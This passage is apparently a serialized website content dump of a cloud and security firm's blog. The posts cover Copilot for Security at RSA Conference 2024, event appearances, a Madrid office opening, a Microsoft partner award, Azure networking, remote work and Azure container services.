We have summarized the key points here.",[41,5549,5551],{"id":5550},"microsoft-copilot-for-security-for-threat-detection","Microsoft Copilot for Security for Threat Detection",[12,5553,31],{},[12,5555,5556],{},"For a long time, risk detection depended on what's known as 'signature-based detection'—a method that identifies threats based on recognized patterns. However, as the threat landscape continues to change and attackers constantly adapt their strategies, this approach alone is no longer sufficient for protection. The next advancement in security technology involves leveraging big data for threat detection. Modern software solutions automatically analyze extensive data sets to detect patterns and potential risks. Nonetheless, to effectively minimize false positives, the expertise of trained specialists is essential. Given the vast amounts of data that need to be processed, this demands significant resources. This is exactly where Microsoft Copilot for Security steps in with innovative solutions designed to support security teams and enhance protection.",[12,5558,5559],{},"In addition to summaries of the most important facts about data security incidents with suggested solutions, Copilot for Security can also respond to prompts about cybersecurity and your own systems. The tool additionally manages more complex tasks, such as crafting your own KQL queries to pull specific security data. 
One particularly useful feature is script analysis, which greatly accelerates the examination of suspicious scripts and command lines.",[12,5561,5562],{},[2642,5563],{"alt":5564,"src":5565},"A screenshot of the script analysis function of Copilot for Security from Microsoft","https://res.cloudinary.com/c4a8/image/upload/v1714461543/blog/pics/rsac-copilot-for-security-script-analysis.png",[41,5567,5569],{"id":5568},"add-copilot-for-security-to-your-system","Add Copilot for Security to Your System",[12,5571,31],{},[12,5573,5574],{},"Like any Large Language Model (LLM), Copilot for Security still requires the careful oversight of experts. However, particularly when analyzing raw data, Copilot for Security proves to be a potent tool that enables customers and Microsoft Security Service Providers (MSSP) to make quicker and more informed decisions.",[12,5576,5577],{},"At glueckkanja, we consider it our mission to constantly improve and find new, innovative ways to protect our customers from the increasing digital threats of everyday life. We therefore recommend that our customers incorporate Copilot for Security into their systems, and we are eager to assist them in planning, implementing, and utilizing the tool.",{"title":65,"searchDepth":111,"depth":111,"links":5579},[5580,5581,5582],{"id":5533,"depth":111,"text":5534},{"id":5550,"depth":111,"text":5551},{"id":5568,"depth":111,"text":5569},{"lang":2171,"seoTitle":5584,"titleClass":2173,"date":5585,"categories":5586,"blogtitlepic":5587,"socialimg":5588,"customExcerpt":5589,"keywords":5590,"contactInContent":5591,"hreflang":5610,"scripts":5615},"glueckkanja at the RSA Conference 2024","2024-04-30",[2176],"head-rsa-conference-2024","/blog/heads/head-rsa-conference-2024.png","When the RSA Conference opens its doors from May 6 to 9, 2024, the glueckkanja team around CEO Christian Kanja and Security Lead Jan Geisbauer will be there again. 
This year, we will be taking a closer look at the new Microsoft Copilot for Security.","glueckkanja, RSA Conference 2024, Microsoft Copilot for Security, Cybersecurity AI Solutions, MISA Awards, Security MSSP of the Year, Signature-Based Detection, Microsoft Intelligent Security Association, Big Data Security Analysis, Microsoft Security Service Provider, AI Cybersecurity Innovation, Script Analysis Tool",{"quote":2181,"infos":5592},{"headline":5263,"subline":5593,"level":41,"textStyling":2204,"flush":2205,"person":5594,"form":5599},"Do you have any questions? We are happy to help you make your business even more secure with Microsoft Copilot for Security.",{"image":2207,"mail":5266,"number":5267,"cloudinary":2181,"alt":2209,"name":2209,"quotee":2209,"quoteeTitle":5108,"quote":5595,"detailsHeader":5269,"details":5596},"Working with Copilot for Security is like wearing an exoskeleton for analysts. All their skills and knowledge are suddenly and massively amplified. We at glueckkanja love Copilot for Security.",[5597,5598],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5600,"method":2169,"action":2216,"fields":5601},{"skin":2215},[5602,5603,5604,5605,5606,5608,5609],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":5288,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5607},"Request Copilot for Security 
advice",{"type":2241,"id":2250,"value":5292},{"type":2241,"id":2253},[5611,5613],{"lang":2260,"href":5612},"/blog/security/2024/04/gk-at-rsac",{"lang":2263,"href":5614},"/blog/security/2024/04/gk-at-rsac-es",{"slick":2181,"form":2181},"/posts/2024-04-30-gk-at-rsac",{"title":5516,"description":5522},"posts/2024-04-30-gk-at-rsac",[5620,5014,2176],"MISA","W_Z6TQYrMSm4TQl72WjJUmGXdeQiBFNCUXm8Udnve5g",{"id":5623,"title":5624,"author":5625,"body":5626,"cta":2166,"description":5630,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5709,"moment":5711,"navigation":2181,"path":5721,"seo":5722,"stem":5723,"tags":5724,"webcast":2168,"__hash__":5727},"content_en/posts/2024-05-06-cloud-summit.md","glueckkanja @ Cloud Summit",[2461],{"type":9,"value":5627,"toc":5705},[5628,5631,5634,5637,5641,5643,5646,5649,5663,5666,5670,5672,5675,5678,5681,5684,5696,5698],[12,5629,5630],{},"These days, everyone is talking about artificial intelligence. The new technology is no longer a futuristic idea, but something that can boost your company's efficiency and proficiency in daily business – provided it is integrated properly into the infrastructure of the organization.",[12,5632,5633],{},"And that's where the trouble often starts. Countless companies continue to rely on outdated technology, even the fax machine is still a much-used tool across Europe. 69% of leaders don't have a clearly defined cloud strategy and 51% of organizations are still trying to understand their on-premises environments *.",[12,5635,5636],{},"Moving towards the future of cloud-management seems to be a steep climb for many companies. But it doesn't have to be.",[41,5638,5640],{"id":5639},"glueckkanja-is-your-techstack","glueckkanja is your TechStack",[12,5642,31],{},[12,5644,5645],{},"The first step of integrating Microsoft Copilot into your company is realizing that AI is deeply dependent on massive amounts of data. 
For these tools to work, you need to develop a clear strategy on how this data is acquired, processed and used. This needs to happen efficiently and above all securely.",[12,5647,5648],{},"At glueckkanja, we specialize in cloud management with a focus on automation, standardization, and continuous optimization. To effectively implement a cloud strategy, we heavily rely on the use of Infrastructure as Code (IaC). As a long-term Microsoft partner, we offer comprehensive cloud solutions in a number of areas:",[1254,5650,5651,5654,5657,5660],{},[1257,5652,5653],{},"Workplace: We set the standard for speed, security and efficiency in Microsoft 365 rollouts across any scale with managed workplace solutions as well as our consulting services.",[1257,5655,5656],{},"Azure: From ground zero to peak efficiency. Secure, standardize and optimize your infrastructure, processes and tools with our managed Azure and AVD Foundation.",[1257,5658,5659],{},"Security: In our connected world, cybersecurity needs to be top priority for companies. As Europe's leading MXDR partner for deploying and managing Defender and Sentinel, we help you to secure your digital environment.",[1257,5661,5662],{},"Products: Enhance your Microsoft 365 power with our cloud-native companion products which improve collaboration, software management and network authentication – like our RADIUSaaS, which works great with Microsoft Cloud PKI and others.",[12,5664,5665],{},"You want to know more about what we can do for you? Visit us on the Cloud Summit!",[41,5667,5669],{"id":5668},"glueckkanja-at-the-european-cloud-summit-2024","glueckkanja at the European Cloud Summit 2024",[12,5671,31],{},[12,5673,5674],{},"From May 14th to May 16th, you can find us at booth 32-CD at the RheinMain CongressCenter, where the Cloud Summit is taking place. 
We're looking forward to lots of exciting conversations with everyone dropping by our booth.",[12,5676,5677],{},"But of course, we're also joining the conversation onstage with a session from Dr. Christoph Hannebauer, Senior Developer at glueckkanja. Christoph will talk about our products SCEP and RADIUS and tell you everything you'll need to know to utilize both of them for your company. In the words of Christoph:",[12,5679,5680],{},"\"Certificate-based authentication (CBA) can be used even when no internet is available. This makes it the ideal choice for network authentication. In my session, I will explain how to enroll certificates to modern workplaces and manage CBA with a cloud-only Certification Authority (CA) and RADIUS. This allows organizations to get rid of on-prem PKIs and NACs and reap the benefits of a cost-effective cloud architecture.\"",[12,5682,5683],{},"Don't miss the session on Wednesday, May 15, 2024, at 12 pm and feel free to catch up with Christoph and us after the session for all your remaining questions and thoughts.",[12,5685,5686,5687,5689,5691,5692,1013],{},"Get in touch with us via ",[2672,5688],{"href":5278},[2672,5690,5277],{"href":5278}," or stay up to date on LinkedIn: ",[2672,5693,5694],{"href":5694,"rel":5695},"https://www.linkedin.com/company/glueckkanja/",[2676],[12,5697,5269],{},[12,5699,5700],{},[5701,5702,5704],"sup",{"id":5703},"fn1","* Source: \"State of the Cloud\" Pluralsight Study June 2023",{"title":65,"searchDepth":111,"depth":111,"links":5706},[5707,5708],{"id":5639,"depth":111,"text":5640},{"id":5668,"depth":111,"text":5669},{"lang":2171,"seoTitle":5710,"titleClass":2173,"date":5711,"categories":5712,"blogtitlepic":5713,"socialimg":5714,"customExcerpt":5715,"keywords":5716,"hreflang":5717,"scripts":5720},"glueckkanja at the Cloud Summit 2024","2024-05-06",[4232],"head-cloud-summit-2024","/heads/head-cloud-summit-2024.png","The European Cloud Summit is happening May 14-16 in Wiesbaden, Germany. 
It’s a major gathering for anyone involved with cloud management. We at glueckkanja are excited to participate, share new ideas, and engage in meaningful conversations. Come find us at our booth or join us for an enlightening talk by Dr. Christoph Hannebauer.","glueckkanja Cloud Summit, European Cloud Summit 2024, cloud management experts, Infrastructure as Code (IaC), Microsoft Copilot integration, AI in cloud management, Microsoft 365 rollout, Managed Azure services, cybersecurity MXDR, cloud-based Microsoft solutions, cloud strategy development, network authentication solutions, cloud-native products, Cloud PKI, RADIUSaaS",[5718],{"lang":2260,"href":5719},"/blog/azure/2024/05/cloud-summit",{"slick":2181,"form":2181},"/posts/2024-05-06-cloud-summit",{"title":5624,"description":5630},"posts/2024-05-06-cloud-summit",[5725,5726,4232,4922,4845],"Flight Engineer","Cloud Management","7rYCf_krzpfHDIXZ8MNzO7_EvG1YM5dif2anW2TXAN4",{"id":5729,"title":5730,"author":5731,"body":5732,"cta":2166,"description":5736,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5772,"moment":5774,"navigation":2181,"path":5825,"seo":5826,"stem":5827,"tags":5828,"webcast":2168,"__hash__":5830},"content_en/posts/2024-05-27-gk-in-spain.md","Viva España, Viva La felicidadkanja",[2500],{"type":9,"value":5733,"toc":5768},[5734,5737,5741,5743,5746,5756,5760,5762,5765],[12,5735,5736],{},"We apologize on behalf of all the Germans that have descended on your country in the past. 
We promise we are different: Efficient, reliable, and fond of German engineering!",[41,5738,5740],{"id":5739},"glueckkanja-launches-its-first-office-in-spain","glueckkanja launches its first office in Spain",[12,5742,31],{},[12,5744,5745],{},"Since the beginning of the year, we have also launched a glueckkanja office in Madrid at Calle de Goya 36 in the Salamanca district, not far from the Basilica de la Concepción de Nuestra Señora and the city's bustling center.",[12,5747,5748,5749,1884,5751,5755],{},"From Spain's capital, we offer our extensive expertise in cybersecurity to companies across the entire Iberian Peninsula. As one of Microsoft's key global partners and as a partner of Microsoft Spain, we offer security solutions, such as ",[2672,5750,3660],{"href":5241},[2672,5752,5754],{"href":5753},"/en/azure/azure-emergency-response-environment/","AzERE",", as individually tailored packages that integrate seamlessly into existing processes. This strategy not only provides comfort to our customers and creates practical synergies in implementation but is particularly promising in Spain, one of the countries hardest hit by cyberattacks worldwide.",[41,5757,5759],{"id":5758},"german-engineering-with-spanish-passion","German engineering with Spanish passion",[12,5761,31],{},[12,5763,5764],{},"Our style is just as efficient (typically German!) as it is unique. The Security Operations Center is delivered directly by our German team. Our analysis and consultation contain the right dose of Spanish passion and a deep understanding of business practices on the Iberian peninsula.",[12,5766,5767],{},"Feel free to visit us at Calle de Goya. We would be happy to chat with you about our cybersecurity portfolio. 
In Spanish, English or German – as you prefer!",{"title":65,"searchDepth":111,"depth":111,"links":5769},[5770,5771],{"id":5739,"depth":111,"text":5740},{"id":5758,"depth":111,"text":5759},{"lang":2171,"seoTitle":5773,"titleClass":2173,"date":5774,"categories":5775,"blogTitleImages":5776,"blogtitlepic":5787,"socialimg":5788,"customExcerpt":5789,"keywords":5790,"contactInContent":5791,"hreflang":5819,"scripts":5824},"glueckkanja opens first office in Spain","2024-05-27",[2962],[5777,5779,5781,5783,5785],{"img":5778,"cloudinary":2181},"/blog/heads/head-spain-reserved-en.png",{"img":5780,"cloudinary":2181},"/blog/heads/head-spain-temperature-en.png",{"img":5782,"cloudinary":2181},"/blog/heads/head-spain-hacker-en.png",{"img":5784,"cloudinary":2181},"/blog/heads/head-spain-cyberattack-en.png",{"img":5786,"cloudinary":2181},"/blog/heads/head-spain-pronunciation-en.png","head-spain-reserved-en","/heads/head-spain-reserved-en.png","You know the type: Germans who tiptoe out of their room early in the morning to reserve the best lounge chairs at the pool (even before the Brits!). Who wear white tennis socks with their sandals. Who drink Sangria out of buckets with straws. Who say 'Pa-ELLA' instead of 'Pa-E-ya' (and 'Ma–LLOR-ca' instead of 'Ma-YOR-ca').","glueckkanja, Madrid, German company in Spain, Cybersecurity, Microsoft, German Engineering, glueckkanja Iberica",{"quote":2181,"infos":5792},{"headline":5793,"subline":5794,"level":41,"textStyling":2204,"flush":2205,"person":5795,"form":5805},"Contact Us Now","Want to know what we can do for you in Spain? 
We would be happy to chat with you about our services and technologies and look forward to hearing from you!",{"image":5796,"cloudinary":2181,"alt":2500,"name":2500,"quotee":2500,"quoteeTitle":5797,"quote":5798,"detailsHeader":5799,"details":5800},"/people/people-juan-jose-fernandez.jpg","Regional Sales Manager","Our new office in Madrid combines German precision and Spanish passion for our streamlined, innovative security solutions that build trust with clients based on local roots.","We look forward to \u003Cbr />hearing from you!'",[5801,5804],{"text":5802,"href":5803,"details":5274,"icon":5275},"+34 680 225643","tel:+34 680 225643",{"text":5277,"href":5278,"icon":5279},{"ctaText":2213,"cta":5806,"method":2169,"action":2216,"fields":5807},{"skin":2215},[5808,5809,5810,5812,5814,5816,5818],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":5811,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},"Email Address*",{"label":5813,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored for the purpose of processing and answering your inquiry. 
For more information on data protection, see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2247,"value":5815},"Inquiry Services in Spain",{"type":2241,"id":2250,"value":5817},"gk-in-spain",{"type":2241,"id":2253},[5820,5822],{"lang":2260,"href":5821},"/blog/corporate/2024/05/gk-in-spain",{"lang":2263,"href":5823},"/blog/corporate/2024/05/gk-in-spain-es",{"slick":2181,"form":2181},"/posts/2024-05-27-gk-in-spain",{"title":5730,"description":5736},"posts/2024-05-27-gk-in-spain",[2176,5829,2971],"Spain","B31xFeLbnIi-jDhsS5c-6kClAkmBHgKdVGjmbm-qBow",{"id":5832,"title":5833,"author":5834,"body":5835,"cta":2166,"description":5839,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5852,"moment":5854,"navigation":2181,"path":5892,"seo":5893,"stem":5894,"tags":5895,"webcast":2168,"__hash__":5896},"content_en/posts/2024-06-26-partner-of-the-year-2024.md","Partner of the Yeah, Yeah, Yeah, Year!",[2461],{"type":9,"value":5836,"toc":5850},[5837,5840,5843],[12,5838,5839],{},"As of today, it’s official: We are once again Microsoft Partner of the Year! Among a global field of top Microsoft partners, we have been honored in 2024 for our outstanding performance and innovative customer solutions based on Microsoft technologies. With over 4,700 nominations and participants from over 100 countries, we have made it to the top! We extend our heartfelt thanks to the entire Microsoft team. It’s always wonderful to know how much you appreciate our work for our customers. Everyone at glueckkanja is thrilled to have you as our partner!",[12,5841,5842],{},"We received this year's \"Partner of the Year\" award for transforming the digital workspaces at a northern German bank. The challenge here was to set new standards for innovation and agility in endpoint management solutions. 
With our self-developed, cloud-based workplace solutions based on Microsoft E5 and Windows 365, we were able to enhance security, efficiency, and satisfaction—while simultaneously reducing costs and increasing productivity. This not only redefined the customer's digital workspace but also established us as a market leader in modern endpoint management solutions. If you’d like to learn more about our “Partner of the Year” case and our award, we’d be happy to personally introduce you to the transformation process.",[12,5844,5845,5846,5849],{},"Now, we're off to celebrate – and we recommend checking out the full list of winners and finalists, which you can find ",[2672,5847,3116],{"href":5848},"https://aka.ms/2024POTYAWinnersFinalists",". Once again, congratulations to all the winners and finalists from all of us.",{"title":65,"searchDepth":111,"depth":111,"links":5851},[],{"lang":2171,"seoTitle":5853,"titleClass":2173,"date":5854,"categories":5855,"blogtitlepic":5856,"socialimg":5857,"customExcerpt":5858,"keywords":5859,"contactInContent":5860,"hreflang":5886,"scripts":5891},"glueckkanja is Microsoft Partner of the Year 2024","2024-06-26",[2962],"head-partner-of-the-year-2024","/heads/head-partner-of-the-year-2024.jpg","Once is just a start, and five times puts you in the establishment. But what do you say to being named Microsoft „Partner of the Year“ for the eighth time? We say: Partner of the Yeah, Yeah, Yeah, Year!","POY, Award, Microsoft Partner of the Year 2024, Transformation process, Endpoint Management, Microsoft E5, Windows 365, Country Partner of the Year",{"quote":2181,"infos":5861},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5793,"subline":5866,"level":41,"textStyling":2204,"flush":2205,"person":5867,"form":5875},"var(--color-secondary)","var(--color-copy)","var(--color-blue-medium)","var(--color-white)","Want to dive deeper into our case and award? We would love to walk you through our transformation process personally. 
Reach out and let us connect!",{"image":5868,"cloudinary":2181,"alt":2420,"name":2420,"quotee":2420,"quoteeTitle":5869,"quote":5870,"detailsHeader":5269,"details":5871},"/people/people-christian-kanja.jpg","CEO","This award is not just an honor, but a motivation. Huge thanks to our fantastic glueckkanja team, our incredible collaboration with clients, and, of course, our teammates at Microsoft. Together, we have achieved great things and have even greater goals ahead.",[5872,5874],{"text":5272,"href":5273,"details":5873,"icon":5275},"Jetzt anrufen",{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5876,"method":2169,"action":2216,"fields":5877},{"skin":2215},[5878,5879,5880,5881,5882,5884,5885],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5883},"Request POY Case",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[5887,5889],{"lang":2260,"href":5888},"/blog/corporate/2024/06/partner-of-the-year-2024",{"lang":2263,"href":5890},"/blog/corporate/2024/06/partner-of-the-year-2024-es",{"slick":2181,"form":2181},"/posts/2024-06-26-partner-of-the-year-2024",{"title":5833,"description":5839},"posts/2024-06-26-partner-of-the-year-2024",[2972,2973],"bzZGA6-zZ5eXSbyz7uIZST3OUrIie5WL0hEayEmP6WY",{"id":5898,"title":5899,"author":5900,"body":5901,"cta":2166,"description":5905,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5923,"moment":5925,"navigation":2181,"path":5956,"seo":5957,"stem":5958,"tags":5959,"webcast":2168,"__hash__":5961},"content_en/posts/2024-07-02-azure-network-management.md","Network Management in Azure: Freedoms & Nuances",[2401],{"type":9,"value":5902,"toc":5921},[5903,5906,5909,5912,5915,5918],[12,5904,5905],{},"In customer projects, we often 
encounter a variety of network implementations in the cloud. Some customers opt for entirely independent network stacks for delivering IaaS services in Azure, such as virtual servers. Others use traditional, network-independent PaaS and SaaS services accessible over the internet or through Microsoft's backbone network via a public endpoint. Adapting on-premises network environments to the cloud is also common but often introduces unnecessary complexity and issues. Clearly, the approaches are diverse, and the implementation possibilities just as complex.",[12,5907,5908],{},"Careful planning is fundamentally important in Azure, yet it's not immutable. To build a hybrid infrastructure, overlapping IP ranges between cloud and on-premises must be avoided. Beyond such fundamental decisions, a variety of solutions can be implemented at any time. Services like Azure Firewall offer edge security services for outbound and inbound traffic at various performance levels. There is no need to deploy third-party NVA solutions or reroute traffic to an on-premises firewall, both of which can be costly. The Azure Application Gateway with WAF (Web Application Firewall) provides an excellent solution for securely deploying internet-facing web services, akin to a simplified DMZ. Recently, it has also become possible to publish and secure other ports beyond the typical web service ports like 80 and 443.",[12,5910,5911],{},"Azure also enables services that would otherwise be deployed via a purely public endpoint to be offered as internal services with private endpoints. The public endpoint can be disabled and replaced with a private endpoint that provides a network interface and thus a private IP address. Note that adding a private endpoint does not disable public access by itself; public network access must be turned off explicitly on the service. Once that is done, the traffic does not leave your network environment and the service is not publicly accessible, enhancing its security. 
However, traffic should always be carefully regulated, perhaps using an Azure Firewall or, more simply, with Network Security Groups.",[12,5913,5914],{},"Azure offers numerous options for networking on-premises data centers, branch offices, or user clients. ExpressRoute provides a fast and reliable service with low latency, although it is costly. Additionally, there are classic site-to-site connections based on VPN with various gateway sizes available. Point-to-site (client-to-Azure) VPN connections with certificate-based or Microsoft Entra ID authentication are also possible.",[12,5916,5917],{},"Microsoft's Virtual WAN service significantly simplifies the global management of the network stack and centralizes many configurations, such as global and regional routing configuration and propagation. This service also allows for the quick and easy implementation and management of services like third-party firewalls or Azure services such as Azure Firewall and Gateways.",[12,5919,5920],{},"In summary, Azure offers a wide array of network services that eliminate the need for high initial investments and significantly lower the barriers to use. However, careful examination is necessary for general network design and solution-specific adjustments to individual applications to determine which solutions are most suitable. We are eager to support you with our experience in designing the optimal network architecture.",{"title":65,"searchDepth":111,"depth":111,"links":5922},[],{"lang":2171,"seoTitle":5924,"titleClass":2173,"date":5925,"categories":5926,"blogtitlepic":5927,"socialimg":5928,"customExcerpt":5929,"keywords":5930,"contactInContent":5931,"hreflang":5952,"scripts":5955},"Network Strategies in Azure: Optimizing Cloud Implementations","2024-07-02",[4232],"head-azure-network-management","/blog/heads/head-network-management.jpg","Discover the flexibility and security of Azure network solutions! Azure offers a wide range of networking services designed for IaaS, PaaS, and SaaS applications. 
From deploying independent network stacks and securing data with Azure Firewall to setting up private endpoints that make services internally available, Azure facilitates the creation of both secure and efficient 100% cloud and hybrid infrastructures. Let us help you reduce complexity and tailor your network design to your needs.","Azure Cloud Services, Network Stacks in Azure, Hybrid Cloud Integration, Azure IaaS, Cloud Security Solutions, Azure Network Optimization, PaaS and SaaS in Azure, Azure Firewall, Azure Private Endpoints, Azure Network Configuration",{"quote":2168,"infos":5932},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":5934,"level":41,"textStyling":2204,"flush":2205,"person":5935,"form":5941},"Get in touch now","Would you like to learn more about Azure network management? We would be happy to personally introduce our approach and assist you with our experience in designing the optimal network configuration. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":5938},"/people/people-pam-team.png","Project & Account Management",[5939,5940],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":5942,"method":2169,"action":2216,"fields":5943},{"skin":2215},[5944,5945,5946,5947,5948,5950,5951],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5949},"Request Azure Network 
Management",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[5953],{"lang":2260,"href":5954},"/blog/azure/2024/07/azure-network-management",{"slick":2181,"form":2181},"/posts/2024-07-02-azure-network-management",{"title":5899,"description":5905},"posts/2024-07-02-azure-network-management",[4232,5726,5070,5960],"IaaS Solutions","qtWeUgQBVyZh6PQMiR3oQkFbcjhO-0EJz76PFf-k7kc",{"id":5963,"title":5964,"author":5965,"body":5966,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6011,"moment":6013,"navigation":2181,"path":6033,"seo":6034,"stem":6035,"tags":6036,"webcast":2168,"__hash__":6038},"content_en/posts/2024-07-08-homeoffice.md","Because the What Matters More Than the Where",[2505],{"type":9,"value":5967,"toc":6008},[5968,5972,5975,5978,5981,5984],[186,5969,5971],{"id":5970},"at-glueckkanja-you-can-continue-to-work-multimobil","At glueckkanja, you can continue to work multimobil.",[12,5973,5974],{},"Unlike many IT firms, you can continue to work as flexibly here as you’ve grown accustomed to over the years. Beyond simply delivering better results, we believe there are numerous other arguments for home office and multimobile working. Less stress, improved balance between work and family life, optimal work-life harmony, increased flexibility, and significantly more personal time—thanks to eliminated commutes—are just a few.",[12,5976,5977],{},"In fact, the Technical University of Darmstadt gathered some compelling findings from a survey conducted between December 2022 and March 2023. According to their data, over 75% of office workers are effective from home. 60% report being more successful and satisfied working from home. Furthermore, over 40% would consider resigning if they had to return to an office-only work environment.",[12,5979,5980],{},"This survey reaffirms our stance. Hence, we remain committed to our policy of flexible workplace choice. 
In doing so, we firmly oppose the current industry trend of reverting to rigid office policies with limited flexibility. If you’re also reluctant to follow this trend, we have something exciting for you: our open positions!",[12,5982,5983],{},"Here you'll find flexible jobs with plenty of work-life balance:",[52,5985,5991],{"className":5986},[5987,5988,5989,5990],"cta-list","d-inline-block","mt-2","mb-2",[2672,5992,6004],{"role":5993,"className":5994,"dataText":6001,"href":6002,"type":6003},"button",[5995,5996,5997,5998,5999,6000],"cta","btn","w-100","w-lg-auto","btn-primary","vue-component","To the job offers","/en/job-offers","Button",[102,6005,6001],{"className":6006},[6007],"cta__text",{"title":65,"searchDepth":111,"depth":111,"links":6009},[6010],{"id":5970,"depth":329,"text":5971},{"lang":2171,"seoTitle":6012,"titleClass":2173,"date":6013,"categories":6014,"blogtitlepic":6015,"blogTitleImages":6016,"socialimg":6018,"customExcerpt":6025,"keywords":6026,"hreflang":6027,"scripts":6032},"Work Multimobil at Glueckkanja: Less Stress and a Better Work-Life Balance","2024-07-08",[2962],"head-homeoffice-gates-en",[6017,6019,6021,6023],{"img":6018,"cloudinary":2181},"/blog/heads/head-homeoffice-gates-en.png",{"img":6020,"cloudinary":2181},"/blog/heads/head-homeoffice-zuse-en.png",{"img":6022,"cloudinary":2181},"/blog/heads/head-homeoffice-berners-lee-en.png",{"img":6024,"cloudinary":2181},"/blog/heads/head-homeoffice-en.png","Have you ever heard of Bill Gates' office chair? Do you know what it looks like? Ergonomic or simple? With armrests or without? No? Never? Don’t worry – neither do we. And there’s a good reason for that: It doesn’t matter what chair you sit on or what environment you’re in when inspiration strikes. 
The only thing that truly matters is the quality of the ideas.","Remote Jobs, Flexible Working, Work-Life Balance, Balancing Career and Family, Working Remotely, Multimobile Working, Stress-Free Work, Choice of Workplace, Satisfaction in Home Office, Jobs in IT Companies",[6028,6030],{"lang":2260,"href":6029},"/blog/corporate/2024/07/homeoffice",{"lang":2263,"href":6031},"/blog/corporate/2024/07/homeoffice-es",{"slick":2181,"form":2181},"/posts/2024-07-08-homeoffice",{"title":5964,"description":65},"posts/2024-07-08-homeoffice",[3088,3089,3090,6037],"Homeoffice","VRLsDL4F7I3Vbwfl2N3vo0rYtcuuNuBdftZ0zgGcDzs",{"id":6040,"title":6041,"author":6042,"body":6043,"cta":2166,"description":6047,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6175,"moment":6177,"navigation":2181,"path":6207,"seo":6208,"stem":6209,"tags":6210,"webcast":2168,"__hash__":6214},"content_en/posts/2024-07-12-containers-on-azure.md","Azure Container Services - modern, efficient and indispensable",[2510],{"type":9,"value":6044,"toc":6169},[6045,6048,6051,6054,6058,6060,6063,6066,6096,6099,6102,6106,6108,6111,6117,6120,6123,6126,6129,6133,6135,6138,6144,6153,6159,6162,6164,6166],[12,6046,6047],{},"In today's fast-paced world, businesses constantly face new challenges that require swift and flexible solutions. A key technology that meets these demands is containers. They enable efficient software development and deployment processes, keeping pace with the rapid tempo of digital transformation.",[12,6049,6050],{},"Containers, the building blocks of modern CI/CD workflows, offer a minimalist and efficient runtime environment that includes only the essential components needed to run an application. 
By separating additional components provided by the host system, containers significantly reduce startup and update times.",[12,6052,6053],{},"The question now arises: how can this potential be best utilized and managed?",[41,6055,6057],{"id":6056},"container-solutions-on-azure","Container Solutions on Azure",[12,6059,31],{},[12,6061,6062],{},"Microsoft Azure offers a wide range of options for running containers, from fully managed solutions where Microsoft handles most of the infrastructure configuration, to lightly managed solutions where you maintain control over the host system management.",[12,6064,6065],{},"Here is a list of container hosting options on Azure from light to fully managed:",[1254,6067,6068,6075,6082,6089],{},[1257,6069,6070],{},[2672,6071,6074],{"href":6072,"rel":6073},"https://learn.microsoft.com/en-us/azure/aks/what-is-aks",[2676],"Azure Kubernetes Services (AKS)",[1257,6076,6077],{},[2672,6078,6081],{"href":6079,"rel":6080},"https://learn.microsoft.com/en-us/azure/container-instances/container-instances-overview",[2676],"Azure Container Instances (ACI)",[1257,6083,6084],{},[2672,6085,6088],{"href":6086,"rel":6087},"https://azure.microsoft.com/en-us/products/app-service/containers/?activetab=pivot:deploytab",[2676],"Azure WebApp for Containers",[1257,6090,6091],{},[2672,6092,6095],{"href":6093,"rel":6094},"https://learn.microsoft.com/en-us/azure/container-apps/overview",[2676],"Azure Container Apps (ACA)",[12,6097,6098],{},"Each service offers its own benefits depending on the intended use case.",[12,6100,6101],{},"Azure Container Registry (ACR) allows for the central storage of containers within your own Azure environment, providing an integrated solution to use ACR as the source for the container images you deploy.",[41,6103,6105],{"id":6104},"spotlight-azure-container-apps","Spotlight: Azure Container Apps",[12,6107,31],{},[12,6109,6110],{},"Azure Container Apps (ACA) represent Microsoft's latest container hosting option. 
